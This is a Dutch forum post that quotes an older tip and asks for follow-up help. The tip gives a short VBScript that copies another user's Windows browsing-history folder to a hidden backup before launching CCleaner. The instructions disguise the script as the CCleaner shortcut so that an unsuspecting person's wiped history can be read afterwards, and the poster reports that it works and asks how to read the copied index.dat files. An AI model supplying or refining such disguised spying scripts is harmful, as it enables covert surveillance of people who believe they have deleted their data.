Geschiedenis terug halen

Status
Niet open voor verdere reacties.

MissMy

Nieuwe gebruiker
Lid geworden
14 jul 2008
Kom even terug op een stuk van 2005: hier gaat het om

Plak onderstaande code in kladblok en verander de "Username" in de werkelijke gebruikersnaam en verander achter "WshShell.Run" de naam van de .exe in de .exe van het schoonmaak-programma welke je gebruikt.. (In die van de program files map)
Sla deze kladblok op als "BackupHistorie.vbs" ergens op je computer bv. C:\Windows.

Klik dit script met rechts en kopieeren naar bureablad (snelkoppeling) klik nu weer die snelkoppeling met rechts en kies " Pictogram aanpassen" en browse met die wizard naar (als voorbeeld) "C:\program files\Ccleaner\ccleaner.exe" en kies daar het ccleaner icoontje en toepassen.. Verwijder verder alle andere ccleaner snelkoppelingen van je bureaublad en snelstart of startmenu.. Verander de naam van snelkoppeling "BackupHistorie.vbs" naar Ccleaner en het verschil is niet meer te zien (zolang je niet in de eigenschappen kijkt) Als iemand op de snelkoppeling klikt om Ccleaner te starten en history te wissen, wordt eerst een kopie gemaakt van de History folder (C:\History_backup) voor dat Ccleaner start.. Nu verwijderd de niets vermoedende MisSurfer alle geschiedenis met Ccleaner en daarna ga jij lekker met het programmaatje indexdatspy in de map C:\History_backup neuzen in de daar gekopieerde index.dat bestanden waar ze overal hebben gesurft...

Code:
Set fso = CreateObject("Scripting.FileSystemObject")

fso.CopyFolder "C:\Documents and Settings\Username\Local Settings\History", "C:\History_backup"

Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "ccleaner.exe"

Nu heb ik dit allemaal gedaan en is helemaal goed. Maar hoe kan ik het verwijderde geschiedenis dan terug lezen? Dit zit in mappen van de back up. Maar dit zijn DAT bestanden? Hoe kan ik die lezen?

Kan iemand mij verder helpen?

Groetjes

Laatst bewerkt:
Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan